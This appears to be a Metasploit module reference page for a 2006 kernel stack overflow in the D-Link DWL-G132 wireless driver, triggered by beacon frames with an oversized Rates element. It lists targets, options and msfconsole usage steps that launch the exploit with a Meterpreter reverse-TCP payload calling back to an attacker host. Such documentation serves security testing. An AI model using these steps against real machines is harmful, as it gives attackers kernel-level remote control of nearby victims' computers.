D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
This module exploits a stack buffer overflow in the A5AGU.SYS driver provided with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow allows remote code execution in kernel mode. The stack buffer overflow is triggered when a 802.11 Beacon frame is received that contains a long Rates information element. This exploit was tested with version 1.0.1.41 of the A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 adapter and appear to resolve this flaw, but D-Link does not offer an updated driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, all cards within range of the attack will be affected. The tested adapter used a MAC address in the range of 00:11:95:f2:XX:XX. Vulnerable clients will need to have their card in a non-associated state for this exploit to work. The easiest way to reproduce this bug is by starting the exploit and then accessing the Windows wireless network browser and forcing it to refresh. D-Link was NOT contacted about this flaw. A search of the SecurityFocus database indicates that D-Link has not provided an official patch or solution for any of the seven flaws listed at the time of writing: (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the DWL-G132 driver (v1.21). This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
Exploit Rank
- Low
Exploit Authors
- hdm < hdm [at] metasploit.com >
- skape < mmiller [at] hick.org >
- Johnny Cache < johnnycsh [at] 802.11mercenary.net >
Vulnerability References
- CVE-2006-6055
- OSVDB-30296
- http://projects.info-pull.com/mokb/MOKB-13-11-2006.html
- ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip
Exploit Targets
- 0 - Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41 (default)
- 1 - Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41
Exploit Development
Similar Exploit Modules
Exploit Usage Information
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/driver/dlink_wifi_rates
msf exploit(dlink_wifi_rates) > show payloads
msf exploit(dlink_wifi_rates) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(dlink_wifi_rates) > set LHOST [MY IP ADDRESS]
msf exploit(dlink_wifi_rates) > exploit
Exploit Module Options
| ADDR_DST | The MAC address to send this to (default: FF:FF:FF:FF:FF:FF) |
| CHANNEL | The initial channel (default: 11) |
| DRIVER | The name of the wireless driver for lorcon (default: autodetect) |
| INTERFACE | The name of the wireless interface (default: wlan0) |
| RUNTIME | The number of seconds to run the attack (default: 60) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |